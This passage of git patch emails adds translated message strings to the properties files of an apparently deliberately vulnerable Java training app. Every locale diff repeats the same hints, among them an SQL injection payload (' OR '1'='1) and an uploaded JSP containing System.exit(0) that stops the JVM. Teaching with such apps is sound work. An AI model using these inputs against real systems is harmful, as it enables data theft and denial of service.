function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) label.access.time=Access Time +label.access.number=Number of Accesses label.attach.file=Attach File label.available.characters=Available Characters label.browser=Browser @@ -124,6 +128,7 @@ label.ip.address=IP Address label.json.string=JSON String label.key=Key label.language=Language +label.last.access.time=Last Access Time label.login=Log in label.login.user.id=Login User ID label.logout=Log out @@ -243,6 +248,7 @@ msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3 msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. +msg.note.threadstarvation=If you change the permission of {0} from read-write to read-only temporarily and you access to this page, then you can never access to this page even if the permission is restored. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. @@ -325,6 +331,7 @@ title.slowregex.page=Test Regular Expression title.sqlijc.page=Search Your Secret Number title.strplusopr.page=Random String Generator title.threadleak.page=Display Current Thread Count +title.threadstarvation.page=Access Status title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File From c2c4da8e2525a5ab39c584b4519ce94e3254f61a Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 21 Oct 2019 21:53:30 +0900 Subject: [PATCH 094/139] New translations messages.properties (French) --- src/main/resources/messages_fr.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_fr.properties b/src/main/resources/messages_fr.properties index a599c50..b453c33 100644 --- a/src/main/resources/messages_fr.properties +++ b/src/main/resources/messages_fr.properties @@ -1,4 +1,5 @@ description.access.history=Access history in this page (The latest 15 records). +description.access.status=Access Status per IP Address description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. @@ -53,6 +54,7 @@ function.description.slow.string.plus.operation=It takes time to append strings. function.description.slow.unnecessary.object.creation=It takes time to respond due to unnecessary object creation. function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. +function.description.thread.starvation=Thread starvation can occur. function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. @@ -97,6 +99,7 @@ function.name.slow.string.plus.operation=Delay of creating string due to +(plus) function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation function.name.sql.injection=SQL Injection function.name.thread.leak=Thread Leak +function.name.thread.starvation=Thread Starvation function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload @@ -107,6 +110,7 @@ function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) label.access.time=Access Time +label.access.number=Number of Accesses label.attach.file=Attach File label.available.characters=Available Characters label.browser=Browser @@ -124,6 +128,7 @@ label.ip.address=IP Address label.json.string=JSON String label.key=Key label.language=Language +label.last.access.time=Last Access Time label.login=Log in label.login.user.id=Login User ID label.logout=Log out @@ -243,6 +248,7 @@ msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3 msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. +msg.note.threadstarvation=If you change the permission of {0} from read-write to read-only temporarily and you access to this page, then you can never access to this page even if the permission is restored. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. @@ -325,6 +331,7 @@ title.slowregex.page=Test Regular Expression title.sqlijc.page=Search Your Secret Number title.strplusopr.page=Random String Generator title.threadleak.page=Display Current Thread Count +title.threadstarvation.page=Access Status title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File From fee022f9dcf0e5e2b4be43c3da5b3d04d637750f Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 21 Oct 2019 21:53:33 +0900 Subject: [PATCH 095/139] New translations messages.properties (German) --- src/main/resources/messages_de.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_de.properties b/src/main/resources/messages_de.properties index a599c50..b453c33 100644 --- a/src/main/resources/messages_de.properties +++ b/src/main/resources/messages_de.properties @@ -1,4 +1,5 @@ description.access.history=Access history in this page (The latest 15 records). +description.access.status=Access Status per IP Address description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. @@ -53,6 +54,7 @@ function.description.slow.string.plus.operation=It takes time to append strings. function.description.slow.unnecessary.object.creation=It takes time to respond due to unnecessary object creation. function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. +function.description.thread.starvation=Thread starvation can occur. function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. @@ -97,6 +99,7 @@ function.name.slow.string.plus.operation=Delay of creating string due to +(plus) function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation function.name.sql.injection=SQL Injection function.name.thread.leak=Thread Leak +function.name.thread.starvation=Thread Starvation function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload @@ -107,6 +110,7 @@ function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) label.access.time=Access Time +label.access.number=Number of Accesses label.attach.file=Attach File label.available.characters=Available Characters label.browser=Browser @@ -124,6 +128,7 @@ label.ip.address=IP Address label.json.string=JSON String label.key=Key label.language=Language +label.last.access.time=Last Access Time label.login=Log in label.login.user.id=Login User ID label.logout=Log out @@ -243,6 +248,7 @@ msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3 msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. +msg.note.threadstarvation=If you change the permission of {0} from read-write to read-only temporarily and you access to this page, then you can never access to this page even if the permission is restored. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. @@ -325,6 +331,7 @@ title.slowregex.page=Test Regular Expression title.sqlijc.page=Search Your Secret Number title.strplusopr.page=Random String Generator title.threadleak.page=Display Current Thread Count +title.threadstarvation.page=Access Status title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File From 53b2a7df73f338d07e000d4d96ede9e7eff5aa49 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 21 Oct 2019 21:53:36 +0900 Subject: [PATCH 096/139] New translations messages.properties (Japanese) --- src/main/resources/messages_ja.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_ja.properties b/src/main/resources/messages_ja.properties index 39f1439..75b0902 100644 --- a/src/main/resources/messages_ja.properties +++ b/src/main/resources/messages_ja.properties @@ -1,4 +1,5 @@ description.access.history=\u3053\u306e\u30da\u30fc\u30b8\u306e\u30a2\u30af\u30bb\u30b9\u5c65\u6b74 (\u6700\u65b0\u306e15\u4ef6) +description.access.status=Access Status per IP Address description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. @@ -53,6 +54,7 @@ function.description.slow.string.plus.operation=It takes time to append strings. function.description.slow.unnecessary.object.creation=It takes time to respond due to unnecessary object creation. function.description.sql.injection=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306fSQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 function.description.thread.leak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u30ed\u30fc\u30c9\u3059\u308b\u305f\u3073\u306b\u3001\u30b9\u30ec\u30c3\u30c9\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +function.description.thread.starvation=Thread starvation can occur. function.description.throwable=\u3053\u306e\u30ea\u30f3\u30af\u3092\u30af\u30ea\u30c3\u30af\u3059\u308b\u3068\u3001{0}\u304c\u30b9\u30ed\u30fc\u3055\u308c\u307e\u3059\u3002 function.description.truncation.error=\u6253\u3061\u5207\u308a\u8aa4\u5dee\u3092\u767a\u751f\u3055\u305b\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002 function.description.unintended.file.disclosure=\u3053\u306e\u30da\u30fc\u30b8\u306b\u306f\u610f\u56f3\u3057\u306a\u3044\u30d5\u30a1\u30a4\u30eb\u516c\u958b\u306e\u8106\u5f31\u6027\u304c\u3042\u308a\u307e\u3059\u3002 @@ -97,6 +99,7 @@ function.name.slow.string.plus.operation=\u30d7\u30e9\u30b9\u6f14\u7b97\u5b50\u3 function.name.slow.unnecessary.object.creation=\u4e0d\u5fc5\u8981\u306a\u30aa\u30d6\u30b8\u30a7\u30af\u30c8\u751f\u6210\u306b\u3088\u308b\u9045\u5ef6 function.name.sql.injection=SQL\u30a4\u30f3\u30b8\u30a7\u30af\u30b7\u30e7\u30f3 function.name.thread.leak=\u30b9\u30ec\u30c3\u30c9\u30ea\u30fc\u30af +function.name.thread.starvation=Thread Starvation function.name.truncation.error=\u6253\u3061\u5207\u308a\u8aa4\u5dee function.name.unintended.file.disclosure=\u610f\u56f3\u3057\u306a\u3044\u30d5\u30a1\u30a4\u30eb\u516c\u958b function.name.unrestricted.ext.upload=\u62e1\u5f35\u5b50\u5236\u9650\u306e\u7121\u3044\u30d5\u30a1\u30a4\u30eb\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9 @@ -107,6 +110,7 @@ function.name.xss=XSS (\u30af\u30ed\u30b9\u30b5\u30a4\u30c8\u30b9\u30af\u30ea\u3 function.name.xxe=XXE (XML\u5916\u90e8\u30a8\u30f3\u30c6\u30a3\u30c6\u30a3) label.access.time=\u30a2\u30af\u30bb\u30b9\u6642\u523b +label.access.number=Number of Accesses label.attach.file=\u6dfb\u4ed8\u30d5\u30a1\u30a4\u30eb label.available.characters=\u5229\u7528\u53ef\u80fd\u306a\u6587\u5b57 label.browser=\u30d6\u30e9\u30a6\u30b6 @@ -124,6 +128,7 @@ label.ip.address=IP\u30a2\u30c9\u30ec\u30b9 label.json.string=JSON\u6587\u5b57\u5217 label.key=\u30ad\u30fc label.language=\u8a00\u8a9e +label.last.access.time=Last Access Time label.login=\u30ed\u30b0\u30a4\u30f3 label.login.user.id=\u30ed\u30b0\u30a4\u30f3\u30e6\u30fc\u30b6\u30fcID label.logout=\u30ed\u30b0\u30a2\u30a6\u30c8 @@ -243,6 +248,7 @@ msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3 msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=\u3053\u306e\u30da\u30fc\u30b8\u3092\u8aad\u307f\u8fbc\u3080\u305f\u3073\u306b\u3001\u30b9\u30ec\u30c3\u30c9\u30ea\u30fc\u30af\u304c\u767a\u751f\u3057\u307e\u3059\u3002 +msg.note.threadstarvation=If you change the permission of {0} from read-write to read-only temporarily and you access to this page, then you can never access to this page even if the permission is restored. msg.note.truncationerror=3\u30017\u30019\u3092\u5165\u529b\u3059\u308b\u3068\u3001\u6253\u3061\u5207\u308a\u8aa4\u5dee\u304c\u767a\u751f\u3057\u307e\u3059\u3002 msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u53ef\u80fd\u306a\u30d5\u30a1\u30a4\u30eb\u30b5\u30a4\u30ba\u306e\u5236\u9650\u304c\u7121\u3044\u305f\u3081\u3001DoS\u653b\u6483\u306a\u3069\u306b\u5bfe\u3057\u3066\u8106\u5f31\u3067\u3059\u3002 @@ -325,6 +331,7 @@ title.slowregex.page=\u6b63\u898f\u8868\u73fe\u306e\u30c6\u30b9\u30c8 title.sqlijc.page=\u6697\u8a3c\u756a\u53f7\u691c\u7d22 title.strplusopr.page=\u30e9\u30f3\u30c0\u30e0\u306a\u6587\u5b57\u5217\u3092\u751f\u6210 title.threadleak.page=\u73fe\u5728\u306e\u30b9\u30ec\u30c3\u30c9\u6570\u306e\u8868\u793a +title.threadstarvation.page=Access Status title.truncationerror.page=\u5c0f\u6570\u306e\u5272\u308a\u7b97 title.unrestrictedextupload.page=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u30b0\u30ec\u30fc\u30b9\u30b1\u30fc\u30eb\u5909\u63db title.unrestrictedsizeupload.page=\u753b\u50cf\u30d5\u30a1\u30a4\u30eb\u306e\u8272\u53cd\u8ee2 From acc44ba0207d702031d8d13373bc978b0a27423b Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 21 Oct 2019 21:53:38 +0900 Subject: [PATCH 097/139] New translations messages.properties (Korean) --- src/main/resources/messages_ko.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_ko.properties b/src/main/resources/messages_ko.properties index a599c50..b453c33 100644 --- a/src/main/resources/messages_ko.properties +++ b/src/main/resources/messages_ko.properties @@ -1,4 +1,5 @@ description.access.history=Access history in this page (The latest 15 records). +description.access.status=Access Status per IP Address description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. @@ -53,6 +54,7 @@ function.description.slow.string.plus.operation=It takes time to append strings. function.description.slow.unnecessary.object.creation=It takes time to respond due to unnecessary object creation. function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. +function.description.thread.starvation=Thread starvation can occur. function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. @@ -97,6 +99,7 @@ function.name.slow.string.plus.operation=Delay of creating string due to +(plus) function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation function.name.sql.injection=SQL Injection function.name.thread.leak=Thread Leak +function.name.thread.starvation=Thread Starvation function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload @@ -107,6 +110,7 @@ function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) label.access.time=Access Time +label.access.number=Number of Accesses label.attach.file=Attach File label.available.characters=Available Characters label.browser=Browser @@ -124,6 +128,7 @@ label.ip.address=IP Address label.json.string=JSON String label.key=Key label.language=Language +label.last.access.time=Last Access Time label.login=Log in label.login.user.id=Login User ID label.logout=Log out @@ -243,6 +248,7 @@ msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3 msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. +msg.note.threadstarvation=If you change the permission of {0} from read-write to read-only temporarily and you access to this page, then you can never access to this page even if the permission is restored. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. @@ -325,6 +331,7 @@ title.slowregex.page=Test Regular Expression title.sqlijc.page=Search Your Secret Number title.strplusopr.page=Random String Generator title.threadleak.page=Display Current Thread Count +title.threadstarvation.page=Access Status title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File From f3c02f959b36da4c814bdf6fc37c8ba9a16d1d9d Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 21 Oct 2019 21:53:41 +0900 Subject: [PATCH 098/139] New translations messages.properties (Russian) --- src/main/resources/messages_ru.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_ru.properties b/src/main/resources/messages_ru.properties index a599c50..b453c33 100644 --- a/src/main/resources/messages_ru.properties +++ b/src/main/resources/messages_ru.properties @@ -1,4 +1,5 @@ description.access.history=Access history in this page (The latest 15 records). +description.access.status=Access Status per IP Address description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. @@ -53,6 +54,7 @@ function.description.slow.string.plus.operation=It takes time to append strings. function.description.slow.unnecessary.object.creation=It takes time to respond due to unnecessary object creation. function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. +function.description.thread.starvation=Thread starvation can occur. function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. @@ -97,6 +99,7 @@ function.name.slow.string.plus.operation=Delay of creating string due to +(plus) function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation function.name.sql.injection=SQL Injection function.name.thread.leak=Thread Leak +function.name.thread.starvation=Thread Starvation function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload @@ -107,6 +110,7 @@ function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) label.access.time=Access Time +label.access.number=Number of Accesses label.attach.file=Attach File label.available.characters=Available Characters label.browser=Browser @@ -124,6 +128,7 @@ label.ip.address=IP Address label.json.string=JSON String label.key=Key label.language=Language +label.last.access.time=Last Access Time label.login=Log in label.login.user.id=Login User ID label.logout=Log out @@ -243,6 +248,7 @@ msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3 msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. +msg.note.threadstarvation=If you change the permission of {0} from read-write to read-only temporarily and you access to this page, then you can never access to this page even if the permission is restored. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. @@ -325,6 +331,7 @@ title.slowregex.page=Test Regular Expression title.sqlijc.page=Search Your Secret Number title.strplusopr.page=Random String Generator title.threadleak.page=Display Current Thread Count +title.threadstarvation.page=Access Status title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File From 32f6031de1723e9cee7670a8eaf8281e2482fbe6 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Mon, 21 Oct 2019 21:53:44 +0900 Subject: [PATCH 099/139] New translations messages.properties (Spanish) --- src/main/resources/messages_es.properties | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/src/main/resources/messages_es.properties b/src/main/resources/messages_es.properties index a599c50..b453c33 100644 --- a/src/main/resources/messages_es.properties +++ b/src/main/resources/messages_es.properties @@ -1,4 +1,5 @@ description.access.history=Access history in this page (The latest 15 records). +description.access.status=Access Status per IP Address description.all=Warning\: Several links cause severe memory leaks or increase CPU usage rate. They can make your computer unstable. The results may change depending on JRE type / version, JVM option, OS, hardware (memory, CPU) or etc. description.capitalize.string=When you enter a string, the capitalized string is shown. For example\: capitalize string -> Capitalize String description.design.page=You can change design of this page. Please click one of the links below and change this page to your style. @@ -53,6 +54,7 @@ function.description.slow.string.plus.operation=It takes time to append strings. function.description.slow.unnecessary.object.creation=It takes time to respond due to unnecessary object creation. function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. +function.description.thread.starvation=Thread starvation can occur. function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. @@ -97,6 +99,7 @@ function.name.slow.string.plus.operation=Delay of creating string due to +(plus) function.name.slow.unnecessary.object.creation=Delay due to unnecessary object creation function.name.sql.injection=SQL Injection function.name.thread.leak=Thread Leak +function.name.thread.starvation=Thread Starvation function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload @@ -107,6 +110,7 @@ function.name.xss=XSS (Cross Site Scripting) function.name.xxe=XXE (XML External Entity) label.access.time=Access Time +label.access.number=Number of Accesses label.attach.file=Attach File label.available.characters=Available Characters label.browser=Browser @@ -124,6 +128,7 @@ label.ip.address=IP Address label.json.string=JSON String label.key=Key label.language=Language +label.last.access.time=Last Access Time label.login=Log in label.login.user.id=Login User ID label.logout=Log out @@ -243,6 +248,7 @@ msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3 msg.note.sqlijc=You can see a secret number if you enter Mark and password. You can see other users information if you enter password to ' OR '1'\='1 msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. +msg.note.threadstarvation=If you change the permission of {0} from read-write to read-only temporarily and you access to this page, then you can never access to this page even if the permission is restored. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. @@ -325,6 +331,7 @@ title.slowregex.page=Test Regular Expression title.sqlijc.page=Search Your Secret Number title.strplusopr.page=Random String Generator title.threadleak.page=Display Current Thread Count +title.threadstarvation.page=Access Status title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File From 7c7df80c4de89d19a940d0f7a4eb54bd1c722b15 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 23 Oct 2019 13:51:09 +0900 Subject: [PATCH 100/139] New translations messages.properties (Chinese Simplified) --- src/main/resources/messages_zh.properties | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/src/main/resources/messages_zh.properties b/src/main/resources/messages_zh.properties index b453c33..4310633 100644 --- a/src/main/resources/messages_zh.properties +++ b/src/main/resources/messages_zh.properties @@ -55,6 +55,7 @@ function.description.slow.unnecessary.object.creation=It takes time to respond d function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. function.description.thread.starvation=Thread starvation can occur. +function.description.thread.unsafe=A class that is not thread-safe is used in this page. function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. @@ -100,6 +101,7 @@ function.name.slow.unnecessary.object.creation=Delay due to unnecessary object c function.name.sql.injection=SQL Injection function.name.thread.leak=Thread Leak function.name.thread.starvation=Thread Starvation +function.name.thread.unsafe=Using Non-Thread-Safe Class function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload @@ -120,6 +122,7 @@ label.character.count=Character Count label.code=Code label.content=Content label.current.thread.count=Current Thread Count +label.determine=Determine label.execution.result=Execution Result\: label.go.to.main=Go to main page label.goto.admin.page=Go to admin main page @@ -205,6 +208,8 @@ msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} +msg.is.leap.year=It's a leap year. +msg.is.not.leap.year=It insn't a leap year. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.mail.change.failed=Mail address change failed. msg.mail.changed=Your mail address is successfully changed. @@ -249,6 +254,7 @@ msg.note.sqlijc=You can see a secret number if you enter Mark and < msg.note.strplusopr=If you enter a large number, then the processing will take several tens of seconds because the string is created by "+" (plus) operator. msg.note.threadleak=Thread leak occurs every time you load this page. msg.note.threadstarvation=If you change the permission of {0} from read-write to read-only temporarily and you access to this page, then you can never access to this page even if the permission is restored. +msg.note.threadunsafe=If you send many requests from multiple clients at the same time, java.lang.NumberFormatException will be thrown. msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, then JavaVM is forcibly finished. msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. @@ -266,6 +272,7 @@ msg.question.reach.the.moon=How many times would you have to fold a piece of pap msg.reverse.color=You can reverse the color of an image file. msg.reverse.color.complete=The color reversal of the image file has completed. msg.reverse.color.fail=The color reversal of the image file fails. +msg.select.year=Please select an year. msg.select.upload.file=Select a file to upload. msg.sent.mail=The mail was sent successfully. msg.unknown.exception.occur=Unknown exception occurs \: {0} @@ -332,6 +339,7 @@ title.sqlijc.page=Search Your Secret Number title.strplusopr.page=Random String Generator title.threadleak.page=Display Current Thread Count title.threadstarvation.page=Access Status +title.threadunsafe.page=Leap year determination title.truncationerror.page=Decimal Division title.unrestrictedextupload.page=Convert Gray Scale of Image File title.unrestrictedsizeupload.page=Reverse Color of Image File From c210bc2ddb26215c3c39c08f4d013548f15779a0 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Wed, 23 Oct 2019 13:51:10 +0900 Subject: [PATCH 101/139] New translations messages.properties (English) --- src/main/resources/messages_en.properties | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/src/main/resources/messages_en.properties b/src/main/resources/messages_en.properties index b453c33..4310633 100644 --- a/src/main/resources/messages_en.properties +++ b/src/main/resources/messages_en.properties @@ -55,6 +55,7 @@ function.description.slow.unnecessary.object.creation=It takes time to respond d function.description.sql.injection=There is an SQL injection vulnerability in this page. function.description.thread.leak=Thread leak occurs every time you load this page. function.description.thread.starvation=Thread starvation can occur. +function.description.thread.unsafe=A class that is not thread-safe is used in this page. function.description.throwable={0} is thrown if you click this link. function.description.truncation.error=Truncation error can occur. function.description.unintended.file.disclosure=There is an unintended file disclosure vulnerability in this page. @@ -100,6 +101,7 @@ function.name.slow.unnecessary.object.creation=Delay due to unnecessary object c function.name.sql.injection=SQL Injection function.name.thread.leak=Thread Leak function.name.thread.starvation=Thread Starvation +function.name.thread.unsafe=Using Non-Thread-Safe Class function.name.truncation.error=Truncation Error function.name.unintended.file.disclosure=Unintended File Disclosure function.name.unrestricted.ext.upload=Extension Unrestricted File Upload @@ -120,6 +122,7 @@ label.character.count=Character Count label.code=Code label.content=Content label.current.thread.count=Current Thread Count +label.determine=Determine label.execution.result=Execution Result\: label.go.to.main=Go to main page label.goto.admin.page=Go to admin main page @@ -205,6 +208,8 @@ msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: msg.invalid.expression=Invalid expression \: {0} 